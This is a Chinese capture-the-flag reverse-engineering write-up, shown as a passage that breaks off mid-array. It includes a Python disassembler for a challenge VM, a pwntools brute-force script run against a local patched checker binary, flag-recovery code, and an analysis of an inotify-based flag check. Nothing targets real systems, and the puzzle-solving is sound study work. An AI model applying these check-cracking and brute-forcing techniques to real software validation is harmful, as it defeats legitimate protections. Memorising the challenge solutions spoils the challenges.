0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 
0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000007, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000F, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000017, 0x0000000B, 0x00000001, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x00000023, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000009, 0x00000003, 0x000001EB, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 
0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000003, 0x00000081, 0x00000004, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 
0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]
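class disasm:
    """Disassembler for the challenge VM's bytecode.

    ``bytecode`` is a flat sequence of integer words. Opcodes 3, 6, 8 and 11
    are followed by one operand word; opcodes 1, 2, 4, 5, 7, 9, 10 and 12
    take none. Each decoded instruction becomes one pseudo-C statement
    labelled with the hexadecimal word index it was decoded from.
    """

    # Word index at which decoding stops. The words after it are presumably
    # zero padding (the array ends in a run of zeros) -- TODO confirm.
    CODE_END = 3828

    # opcode -> template taking only the label
    _NO_OPERAND = {
        1: "%s: reg_char = Memory[reg_addr]",
        2: '%s: puts("Checking flag...");',
        4: "%s:\nv3 = base64(reg_int, dest, 10);\nstrcpy(dest, v3);\n"
           "reg_addr = strtol(dest, 0LL, 16);\nreg_int = reg_addr;",
        5: "%s: reg_int += 1",
        7: "%s: reg_int = reg_char",
        9: "%s:\nbuffer2 = malloc(0xC8uLL);\nbuffer2 = sub_117B(buffer);\n"
           "v9 = 0;\nbuffer = malloc(5uLL);",
        10: "%s:\nif ( Memory[reg_int] != buffer2[v9]) )\nv6 = 10;\n++v9;",
        12: "%s: putchar(Memory[reg_int + v6])",
    }

    # opcode -> template taking the label and the operand word that follows
    _ONE_OPERAND = {
        3: "%s: reg_int = %d",
        6: "%s: reg_char = flag[%d]",
        8: "%s: buffer[%d] = reg_char",
        11: "%s: if ((char)(reg_char %% 9) != %d) v6 = 10;",
    }

    def __init__(self, bytecode) -> None:
        """Keep a reference to the bytecode word sequence to decode."""
        self.bytecode = bytecode

    def addr_transfer(self, addr):
        """Return the label for word index ``addr``: "_" plus lowercase hex."""
        return "_" + hex(addr)[2:]

    def disasm(self):
        """Decode the bytecode and write the listing to ``result.cpp``.

        Decoding stops at ``CODE_END`` or at the end of the bytecode,
        whichever comes first. An unknown opcode, or an opcode whose operand
        word is missing, is reported on stdout, emitted as a comment line and
        skipped by one word, so the loop always terminates.
        """
        code = self.bytecode
        # Never index past the data actually supplied.
        end = min(self.CODE_END, len(code))
        lines = []
        pc = 0
        while pc < end:
            opcode = code[pc]
            label = self.addr_transfer(pc)
            if opcode in self._NO_OPERAND:
                text = self._NO_OPERAND[opcode] % label
                pc += 1
            elif opcode in self._ONE_OPERAND and pc + 1 < len(code):
                text = self._ONE_OPERAND[opcode] % (label, code[pc + 1])
                pc += 2
            elif opcode in self._ONE_OPERAND:
                # The operand word would lie past the end of the bytecode.
                print(opcode, pc)
                text = "%s: // truncated opcode %d" % (label, opcode)
                pc += 1
            else:
                # Advance past the unknown word; without this the loop would
                # print the same word forever.
                print(opcode, pc)
                text = "%s: // unknown opcode %d" % (label, opcode)
                pc += 1
            lines.append(text + ";\n")
        # The context manager flushes and closes the output file.
        with open("result.cpp", "w") as out:
            out.write("".join(lines))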
# Decode the VM bytecode array defined above; the pseudo-C listing is written
# to result.cpp in the current directory.
dis = disasm(bytecode)
dis.disasm()
得到反编译结果如下 (片段)
_0: reg_char = flag[0];
_2: if ((char)(reg_char % 9) != 6) v6 = 10;;
_4: reg_int = reg_char;
_5:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr
_6: reg_char = Memory[reg_addr];
_7: buffer[0] = reg_char;
_9: reg_char = flag[8];
_b: if ((char)(reg_char % 9) != 5) v6 = 10;;
_d: reg_int = reg_char;
_e:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_f: reg_char = Memory[reg_addr];
_10: buffer[1] = reg_char;
_12: reg_char = flag[16];
_14: if ((char)(reg_char % 9) != 8) v6 = 10;;
_16: reg_int = reg_char;
_17:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_18: reg_char = Memory[reg_addr];
_19: buffer[2] = reg_char;
_1b: reg_char = flag[24];
_1d: if ((char)(reg_char % 9) != 3) v6 = 10;;
_1f: reg_int = reg_char;
_20:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_21: reg_char = Memory[reg_addr];
_22: buffer[3] = reg_char;
_24: reg_char = flag[31];
_26: if ((char)(reg_char % 9) != 3) v6 = 10;;
_28: reg_int = reg_char;
_29:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_2a: reg_char = Memory[reg_addr];
_2b: buffer[4] = reg_char;
_2d:
buffer2 = malloc(0xC8uLL);
buffer2 = sub_117B(buffer);
v9 = 0;
buffer = malloc(5uLL);;
_2e: reg_int = 140;
_30:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_31: puts("Checking flag...");;
_32:
if ( Memory[reg_int] != buffer2[v9]) )
这是一组数据的验证,一共有 8 组这样的验证,一共验证 flag 36 个字符。
这一组验证中,flag[x] 经过变换得到 buffer[n],且需要满足模 9 的余数条件;一组 buffer 计算完成后调用 sub_117B 进一步计算,最终再把该函数的返回值与目标数据比较。
flag[x] 到 buffer[n] 不是唯一映射, 所以有模数限制。
映射关系如下
// Input: 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
// Output:8472001712585036770886014270876835165635f3254476f3554f516ff338
sub_117B 的输入是4个字符或5个字符,字符集为0 - 8
这个函数利用 fork 实现递归,简单 patch 后进行爆破即可
from pwn import *
import json
import os
from multiprocessing.dummy import Pool as ThreadPool
# Number of worker threads; worker n uses its own checker directory f<n>.
threads = 10
# tasks2[n] holds the candidate inputs assigned to worker n.
tasks2 = [[] for _ in range(threads)]
# (candidate, first output line) pairs appended by the workers.
tresult = []
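def RunT2(n):
    """Worker ``n``: feed every candidate in ``tasks2[n]`` to the patched checker.

    For each candidate a fresh ``flagchecker1`` process is started in the
    worker's own directory, the candidate is sent on stdin and the first
    output line is stored in ``tresult`` as ``(candidate, line)``.

    A run is repeated when spawning or talking to the process fails, or when
    the output line contains ``b'Can'`` (presumably a "Cannot ..." error from
    the checker -- TODO confirm). The retry is unbounded, as in the original.
    """
    workdir = "/home/pandaos/Desktop/fuck/f%d/" % n
    binary = "/home/pandaos/Desktop/fuck/f%d/flagchecker1" % n
    check_file = "/home/pandaos/Desktop/fuck/f%d/check" % n
    for m in tasks2[n]:
        while True:
            # Reset per attempt so the finally clause never closes a stale
            # (or unbound) process object when the spawn itself fails.
            p = None
            try:
                p = process(binary, cwd=workdir)
                # Best effort: remove a leftover "check" file (presumably
                # state from an earlier run) before sending input.
                try:
                    if os.path.exists(check_file):
                        os.remove(check_file)
                except OSError:
                    pass
                p.sendline(m.encode("ascii"))
                data = p.recvline()
            except Exception:
                # Spawn or I/O failure: try this candidate again.
                continue
            finally:
                if p is not None:
                    p.close()
            if b'Can' in data:
                # The checker reported an error instead of a result; retry.
                continue
            break
        tresult.append((m, data))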
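# Alphabet of sub_117B inputs: the digits 0-8.
fuck_table = '012345678'
i = [0] * 5
data_map = dict()
tasks = []
k = 0
tmp_task = []
# Enumerate every 5-character candidate (9**5 of them) and deal them out
# round-robin to the workers. Only 5-character inputs are generated here.
for i[0] in fuck_table:
    for i[1] in fuck_table:
        for i[2] in fuck_table:
            for i[3] in fuck_table:
                for i[4] in fuck_table:
                    test = "".join(i)
                    # Bucket by the configured worker count, not a literal 10,
                    # so tasks2 and the thread loop below always agree.
                    tasks.append((test, k % threads))
                    tasks2[k % threads].append(test)
                    k += 1
# Start one worker per bucket and wait for all of them to finish.
mythreads = []
for i in range(threads):
    th = threading.Thread(target=RunT2, args=(i, ))
    th.start()
    mythreads.append(th)
for th in mythreads:
    th.join()
print(tresult)
# The file holds the Python repr of the result list, not JSON, despite its
# name. The context manager flushes and closes it.
with open("ffk.json", "w") as out:
    out.write(str(tresult))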
提取比较数据后在爆破结果中查找对应的输入
比较数据与对应的 sub_117B 输入参数
84721
234231224221234231224221233423312324232124342431242424212434243124242421243342433124324243212342312242212342312242212334233123242321343124213431242133433132432143443142442143443142442143344331432443213431242134312421334331324321
1138
44244442444432443442444452445412414124141324134124141524151421414214143214314214145214511211112111132113112111152115
80481
224221242124242421244241224221242125242521254251254242542125442541252425212542512242212421242424212442412242212421242141424421444124214152452154515424542154454152452154512421414244214441242141
224262646622426264663232432632633436362242626466224262646632324326326334363632324326326334363632324326326334363633233243326332633334336336
57518
444244444124414342434431243145424544512451444244444124414342434431243145424544512451434424344434124341433424334433124331435424354435124351344234434123413342334331233135423543512351344234434123413342334331233135423543512351334423344334123341333423334333123331335423354335123351544254454125415342534531253155425545512551544254454125415342534531253155425545512551534425344534125341533425334533125331535425354535125351
343335344343345343335344343345344434433445344343345343335344343345343335242325244243245242325244243245244424432445244243245242325244243245242325
02162
34334234433442346334623463346231331231433142316331623163316224324224432442246324622463246221321221432142216321622163216253435342534435344253463534625346353462531353125314353142531635316253163531625243524252443524425246352462524635246252135212521435214252163521625216352162343342344334423463346234633462313312314331423163316231633162243242244324422463246224632462213212214321422163216221632162
1854
424424442442342344234254254425444444443434434545445124124412412312341231251254125141441413134131515415
最后计算 flag
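# The flag is 36 characters long; the entries are filled in further down.
flag = [0] * 36
# t1[i] is a candidate flag character and t2[i] the character it maps to
# (the mapping recovered from the checker). The backslash is written as
# "\\" because "\]" is an invalid escape sequence that newer Python versions
# warn about; the string value is unchanged.
t1 = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
t2 = '80230103415684857787827121576760008653455327627513233564681454fffffff3003058723412112363462845'
# Invert the mapping: mapped character -> every input character producing it.
# It is many-to-one, so each value is a list kept in t1 order.
dict_data = {}
for src_ch, dst_ch in zip(t1, t2):
    dict_data.setdefault(dst_ch, []).append(src_ch)
print(dict_data)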
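def mrev(ch, idx):
    """Return the flag character for check number ``idx`` that maps to ``ch``.

    ``dict_data[ch]`` lists every input character whose mapped value is
    ``ch``. The mapping is not unique, so the candidate is selected by the
    VM's extra condition ``ord(x) % 9 == tt[idx]``, where ``tt`` holds the
    required residue for each of the 36 checks in order.

    Raises:
        KeyError: ``ch`` is not a mapped value in ``dict_data``.
        RuntimeError: no candidate satisfies the residue condition.
    """
    tt = '658332610045238537383836556104255318'
    candidates = dict_data[ch]
    wanted = int(tt[idx])
    for x in candidates:
        if ord(x) % 9 == wanted:
            return x
    # The original bare `raise` also produced a RuntimeError here, but only
    # by accident and without saying which check failed.
    raise RuntimeError(
        "no character maps to %r with residue %d (check %d)" % (ch, wanted, idx)
    )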
# One entry per check group: the sub_117B input recovered for that group and
# the flag indexes whose mapped characters make up that input, in order.
groups = [
    ("84721", (0, 8, 16, 24, 31)),
    ("1138", (1, 9, 17, 25)),
    ("80481", (2, 10, 18, 26, 32)),
    ("7786", (3, 11, 19, 27)),
    ("57518", (4, 12, 20, 28, 33)),
    ("2445", (5, 13, 21, 29)),
    ("02162", (6, 14, 22, 30, 34)),
    ("1854", (7, 15, 23, 35)),
]
# check_no counts the checks across all groups (0..35); mrev uses it to pick
# the required residue for each character.
check_no = 0
for digits, positions in groups:
    for digit, pos in zip(digits, positions):
        flag[pos] = mrev(digit, check_no)
        check_no += 1
print(flag)
总结一下,这道题逻辑比较简单,提取数据过程比较繁琐,适合用来练习调试技巧与IDA脚本的编写。
noodes
比较的地方
if ( !strcmp(
s1,
"dfxXdf5FcwL\\adsUddPedd}UdflZafn~af9TmflZcwlZafilddKYafM^dfxRmfENcwENddXmdf\\Raff\\df{xddL[adeiadJkdfW5cwiTdd7"
"Ydf^zadkKcw:jadeudfU=dfj~dd[}dfM9cwp7dfhnmfTjcwTjddyQdfftdd5UdfIxddGydfgnddjYdfqZcwqPcwfpdflLddUoaf~vddWqafZJd"
"f=Tcw{Zmf|Fcw|FddnkadUgdfj\\dfr^dd]SdfGJcwwJdfFtcwzFcwXVcwE|cwkPddWMdd]iadu:cwFRad\\IafXrafNxmfElcwElafJvafx9d"
"f4|dd8mmfH~cwH~mfT~cwT~afkFafvpdfj5dd}SafVRmfFpmfP|mfThmfNLmf5ZcwFpcwP|cw\\xcw=7cwyncwG|cwThcwNLcw\\pcwI^cw5ZcwOT") )
s1的生成
// Decompiler output (excerpt of one function body; the signature and the
// LABEL_35 target are not part of this excerpt).
// It watches /tmp/chall/ with inotify, lets a child process perform file
// operations driven by user input, then turns the recorded events into the
// string s1: a two-letter tag per event followed by the first two bytes of
// the file name, each increased by 4.
// Event records are read through raw offsets that match struct inotify_event:
//   *((_DWORD *)byte + 1) -> mask, *((_DWORD *)byte + 3) -> len,
//   byte[16], byte[17]    -> name[0], name[1]
// fs:0x28 read: the usual stack-protector canary load on x86-64 Linux.
v45 = __readfsqword(0x28u);
index = 0;
s_index = 0;
sub_55D31246E16A();
sub_55D31246E1FA();
fd = inotify_init(); // create an inotify instance
if ( fd < 0 )
perror("inotify_init");
sub_55D31246E4B7("/tmp/chall/"); // set up the files before the watch is added
// 0x33F = IN_ACCESS | IN_MODIFY | IN_ATTRIB | IN_CLOSE_WRITE | IN_CLOSE_NOWRITE
//         | IN_OPEN | IN_CREATE | IN_DELETE
wd = inotify_add_watch(fd, "/tmp/chall/", 0x33Fu); // add the watch to the inotify instance
pid = fork(); // create the child process
if ( !pid )
sub_55D31246E668("/tmp/chall/"); // child: processes user input and changes the files
if ( waitpid(pid, &stat_loc, 0) == -1 )
{
perror("waitpid failed\n");
goto LABEL_35;
}
// BYTE1(stat_loc) is bits 8..15 of the wait status (the exit code after a normal exit).
v40 = BYTE1(stat_loc);
printf("%d", BYTE1(stat_loc));
// A single read() collects the queued events after the child has finished.
size = read(fd, buf, 0x8000uLL);
if ( size < 0 )
perror("read");
while ( index < size )
{
byte = &buf[index];
// len == 0: the event carries no name, so nothing is appended for it.
if ( !*((_DWORD *)byte + 3) )
goto LABEL_30;
// The mask tests below form a chain: only the first matching bit is recorded.
// IN_OPEN (0x20) and IN_CLOSE_NOWRITE (0x10) have no branch and add nothing to s1.
if ( (*((_DWORD *)byte + 1) & 0x100) != 0 ) // IN_CREATE
{
v3 = s_index;
if ( (*((_DWORD *)byte + 1) & 0x40000000) != 0 )// IN_ISDIR
{
// tag "cd": directory created
++s_index;
s1[v3] = 'c';
v4 = s_index++;
s1[v4] = 'd';
}
else
{
// tag "cf": file created
++s_index;
s1[v3] = 'c';
v5 = s_index++;
s1[v5] = 'f';
}
LABEL_26:
// Shared tail for create/delete/attrib: append name[0] + 4 and name[1] + 4.
v23 = byte[16] + 4;
v24 = s_index++;
s1[v24] = v23;
v25 = byte[17] + 4;
v26 = s_index++;
s1[v26] = v25;
goto LABEL_30;
}
if ( (*((_DWORD *)byte + 1) & 0x200) != 0 ) // IN_DELETE
{
v6 = s_index;
if ( (*((_DWORD *)byte + 1) & 0x40000000) != 0 )
{
// tag "dd": directory deleted
++s_index;
s1[v6] = 'd';
v7 = s_index++;
s1[v7] = 'd';
}
else
{
// tag "df": file deleted
++s_index;
s1[v6] = 'd';
v8 = s_index++;
s1[v8] = 'f';
}
goto LABEL_26;
}
if ( (*((_DWORD *)byte + 1) & 8) != 0 ) // IN_CLOSE_WRITE
{
// tag "cw", then name[0] + 4 and name[1] + 4
v9 = s_index++;
s1[v9] = 'c';
v10 = s_index++;
s1[v10] = 'w';
v11 = byte[16] + 4;
v12 = s_index++;
s1[v12] = v11;
v13 = byte[17] + 4;
v14 = s_index++;
s1[v14] = v13;
goto LABEL_30;
}
if ( (*((_DWORD *)byte + 1) & 1) != 0 ) // IN_ACCESS
{
// tag "ac", then name[0] + 4 and name[1] + 4
v15 = s_index++;
s1[v15] = 'a';
v16 = s_index++;
s1[v16] = 'c';
v17 = byte[16] + 4;
v18 = s_index++;
s1[v18] = v17;
v19 = byte[17] + 4;
v20 = s_index++;
s1[v20] = v19;
goto LABEL_30;
}
if ( (*((_DWORD *)byte + 1) & 4) != 0 ) // IN_ATTRIB
{
v21 = s_index;
if ( (*((_DWORD *)byte + 1) & 0x40000000) != 0 )
{
// tag "ad": attributes of a directory changed
++s_index;
s1[v21] = 'a';
v22 = s_index++;
s1[v22] = 'd';
}
else
{
// tag "af": attributes of a file changed
++s_index;
s1[v21] = 'a';
v27 = s_index++;
s1[v27] = 'f';
}
goto LABEL_26;
}
if ( (*((_DWORD *)byte + 1) & 2) != 0 ) // IN_MODIFY
{
// tag "mf", then name[0] + 4 and name[1] + 4
v28 = s_index++;
s1[v28] = 'm';
v29 = s_index++;
s1[v29] = 'f';
v30 = byte[16] + 4;
v31 = s_index++;
s1[v31] = v30;
v32 = byte[17] + 4;
v33 = s_index++;
s1[v33] = v32;
}
LABEL_30:
// Next record: 16-byte fixed header plus len bytes of name.
index += *((_DWORD *)byte + 3) + 16;
}
inotify
这个感觉和git有点点像, 监控文件的变动, 变动会生成事件
/* One event record as returned by read() on an inotify descriptor.
   The decompiled loop above reads it through raw offsets: the four 4-byte
   fields form a 16-byte header (mask at byte 4, len at byte 12) and the
   name starts at byte 16. */
struct inotify_event {
int wd; /* Watch descriptor */
uint32_t mask; /* Mask of events */
uint32_t cookie; /* Unique cookie associating related
events (for rename(2)) */
uint32_t len; /* Size of name field */
char name[]; /* Optional null-terminated name */
};
这里涉及的事件
IN_ACCESS 0x00000001
文件被访问(读取)(*)。
IN_CLOSE_WRITE 0x00000008
为写入而打开的文件已关闭 (*)。
IN_ATTRIB 0x00000004
权限修改
IN_ISDIR 0x40000000
事件的目标是文件夹
IN_CREATE 0x00000100
有新文件产生(可能是目录)
IN_DELETE 0x00000200
有文件被删除(可能是目录)
IN_MODIFY 0x00000002
修改文件
这里 4 个 4 字节的字段(wd、mask、cookie、len)共 16 字节,刚好对应 index += *((_DWORD *)byte + 3) + 16; 中的加 16;*((_DWORD *)byte + 3) 即 len 字段,也就是 name 的长度。
处理输入
1: stream[v3] = fopen(dest, "a+");
2: fclose(stream[--v9]);//生成cw
3: fwrite("Wrong", 1uLL, 5uLL, stream[v9 - 1]);//生成mf
4: unlink(dest);//生成df
5: chmod(dest, 0x164u);//生成af
6: rmdir(dest);//生成dd
7: mkdir(dest, 0x1C0u);//生成cd
8:exit(0)
除了2,3不能有名称之外都有2字节的名称
分析比较字符串
这里的字符串没有新建操作, 前面的文件初始化已经完成了(监控开启之前)
注意:df 之后不能再打开文件,否则会出现新建操作。这里有一处正是 df 之后才 mf 的,应该在 df 之前就打开文件,我把这个打开操作放在了最前面。mf 和 cw 之前一定要先打开文件指针,同一个文件只需要打开一次(每次 mf 都会有 cw 收尾)。exit 会关闭所有的文件指针(这里也会被记录,后打开的先关闭)。
生成输入脚本: (因为mf操作不多, 我就直接手动删除多余的新建操作, 最后再加个8)
#include<iostream>
using namespace std;
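int main()
{
    // Expected event string from the writeup's analysis, stored as 4-byte
    // records: a two-character event tag ("cw", "mf", "df", "af", "ad", "dd",
    // "cd", ...) followed by two file-name bytes, each stored with +4 added.
    char a[437] = {
        0x64, 0x66, 0x78, 0x58, 0x64, 0x66, 0x35, 0x46, 0x63, 0x77, 0x4C, 0x5C, 0x61, 0x64, 0x73, 0x55,
        0x64, 0x64, 0x50, 0x65, 0x64, 0x64, 0x7D, 0x55, 0x64, 0x66, 0x6C, 0x5A, 0x61, 0x66, 0x6E, 0x7E,
        0x61, 0x66, 0x39, 0x54, 0x6D, 0x66, 0x6C, 0x5A, 0x63, 0x77, 0x6C, 0x5A, 0x61, 0x66, 0x69, 0x6C,
        0x64, 0x64, 0x4B, 0x59, 0x61, 0x66, 0x4D, 0x5E, 0x64, 0x66, 0x78, 0x52, 0x6D, 0x66, 0x45, 0x4E,
        0x63, 0x77, 0x45, 0x4E, 0x64, 0x64, 0x58, 0x6D, 0x64, 0x66, 0x5C, 0x52, 0x61, 0x66, 0x66, 0x5C,
        0x64, 0x66, 0x7B, 0x78, 0x64, 0x64, 0x4C, 0x5B, 0x61, 0x64, 0x65, 0x69, 0x61, 0x64, 0x4A, 0x6B,
        0x64, 0x66, 0x57, 0x35, 0x63, 0x77, 0x69, 0x54, 0x64, 0x64, 0x37, 0x59, 0x64, 0x66, 0x5E, 0x7A,
        0x61, 0x64, 0x6B, 0x4B, 0x63, 0x77, 0x3A, 0x6A, 0x61, 0x64, 0x65, 0x75, 0x64, 0x66, 0x55, 0x3D,
        0x64, 0x66, 0x6A, 0x7E, 0x64, 0x64, 0x5B, 0x7D, 0x64, 0x66, 0x4D, 0x39, 0x63, 0x77, 0x70, 0x37,
        0x64, 0x66, 0x68, 0x6E, 0x6D, 0x66, 0x54, 0x6A, 0x63, 0x77, 0x54, 0x6A, 0x64, 0x64, 0x79, 0x51,
        0x64, 0x66, 0x66, 0x74, 0x64, 0x64, 0x35, 0x55, 0x64, 0x66, 0x49, 0x78, 0x64, 0x64, 0x47, 0x79,
        0x64, 0x66, 0x67, 0x6E, 0x64, 0x64, 0x6A, 0x59, 0x64, 0x66, 0x71, 0x5A, 0x63, 0x77, 0x71, 0x50,
        0x63, 0x77, 0x66, 0x70, 0x64, 0x66, 0x6C, 0x4C, 0x64, 0x64, 0x55, 0x6F, 0x61, 0x66, 0x7E, 0x76,
        0x64, 0x64, 0x57, 0x71, 0x61, 0x66, 0x5A, 0x4A, 0x64, 0x66, 0x3D, 0x54, 0x63, 0x77, 0x7B, 0x5A,
        0x6D, 0x66, 0x7C, 0x46, 0x63, 0x77, 0x7C, 0x46, 0x64, 0x64, 0x6E, 0x6B, 0x61, 0x64, 0x55, 0x67,
        0x64, 0x66, 0x6A, 0x5C, 0x64, 0x66, 0x72, 0x5E, 0x64, 0x64, 0x5D, 0x53, 0x64, 0x66, 0x47, 0x4A,
        0x63, 0x77, 0x77, 0x4A, 0x64, 0x66, 0x46, 0x74, 0x63, 0x77, 0x7A, 0x46, 0x63, 0x77, 0x58, 0x56,
        0x63, 0x77, 0x45, 0x7C, 0x63, 0x77, 0x6B, 0x50, 0x64, 0x64, 0x57, 0x4D, 0x64, 0x64, 0x5D, 0x69,
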